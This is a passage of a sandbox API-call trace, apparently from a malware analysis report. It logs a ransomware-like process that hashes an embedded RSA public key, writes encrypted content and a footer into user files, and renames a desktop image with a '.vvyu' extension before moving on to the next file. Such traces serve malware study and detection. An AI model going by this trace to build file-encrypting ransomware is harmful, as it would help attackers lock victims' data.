KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.488] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.488] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.489] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.489] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.489] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.489] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.489] GetLastError () returned 0x0 [0192.489] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.489] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.490] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.490] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.490] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14a40) returned 0x2ea79b0 [0192.491] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95260 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e952a8 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.493] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ea68 [0192.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93618 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93600 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.496] GetCurrentThreadId () returned 0x66c [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e4a0 [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.497] GetCurrentThreadId () returned 0x66c [0192.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93618 [0192.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93678 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93690 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93630 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93600 [0192.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9ea68 [0192.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ec78 [0192.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0192.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ee90 [0192.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ec78 | out: hHeap=0x620000) returned 1 [0192.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee90 | out: hHeap=0x620000) returned 1 [0192.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e952a8 | out: hHeap=0x620000) returned 1 [0192.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.513] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x14a3f, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x14a3f, lpOverlapped=0x0) returned 1 [0192.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.515] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x14a44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.515] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.518] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.519] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.519] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.519] CloseHandle (hObject=0x568) returned 1 [0192.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e9ea68 [0192.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.522] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\j2JjIfMTo45JZEp.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\j2jjifmto45jzep.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\j2JjIfMTo45JZEp.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\j2jjifmto45jzep.jpg.vvyu")) returned 1 [0192.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.523] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.526] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeab39500, ftCreationTime.dwHighDateTime=0x1d89b56, ftLastAccessTime.dwLowDateTime=0xd3f1f40, ftLastAccessTime.dwHighDateTime=0x1d8a5d4, ftLastWriteTime.dwLowDateTime=0xd3f1f40, ftLastWriteTime.dwHighDateTime=0x1d8a5d4, nFileSizeHigh=0x0, nFileSizeLow=0x938a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jqzylB.m4a", cAlternateFileName="")) returned 1 [0192.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e952a8 [0192.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0192.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e952a8 | out: hHeap=0x620000) returned 1 [0192.526] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\jqzylB.m4a") returned=".m4a" [0192.526] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\jqzylB.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\jqzylb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.526] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=37770) returned 1 [0192.527] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.530] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x9364, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.530] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.533] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.533] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, 